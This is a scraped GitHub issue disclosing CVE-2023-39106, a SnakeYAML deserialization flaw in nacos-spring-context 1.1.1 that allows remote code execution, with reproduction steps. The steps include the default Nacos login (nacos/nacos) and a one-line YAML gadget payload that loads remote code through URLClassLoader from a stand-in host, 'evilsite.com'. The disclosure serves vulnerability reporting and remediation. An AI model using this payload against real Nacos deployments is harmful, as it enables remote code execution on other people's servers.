Headline
CVE-2023-39106: YAML deserialization vulnerability leads to RCE · Issue #314 · nacos-group/nacos-spring-project
An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.
Issue Description
The SnakeYaml’s Constructor() class is used in the component nacos-spring-context, but it does not restrict types that can be instantiated during deserialization.
Describe what happened (or what feature you want)
Deserializing yaml content provided by an attacker can lead to remote code execution.
So when spring framework project uses nacos-spring-context as a dependency, It will be easily RCE by just adding evil config in nacos server.
Describe what you expected to happen
Unsupported YAML content.
How to reproduce it (as minimally and precisely as possible)
Create a project of empty spring-framework, and add dependency of nacos-spring-context.
Add codes below, as the document says, it setting NacosPropertySource:
+import com.alibaba.nacos.api.config.ConfigType; +import com.alibaba.nacos.spring.context.annotation.config.NacosPropertySource;
@SpringBootApplication +@NacosPropertySource(dataId = "example.yaml", type=ConfigType.YAML, autoRefreshed=true) public class Application {
public static void main(String[] args) { ......
Now login to nacos config server(default at http://127.0.0.1:8848 with credential of nacos/nacos), then edit example.yaml, add one line of config below:
test: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL [ “http://evilsite.com” ]]]]
Tell us your environment
spring-framework 2.7.8
nacos-spring-context 1.1.1
Anything else we need to know?
Related news
An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.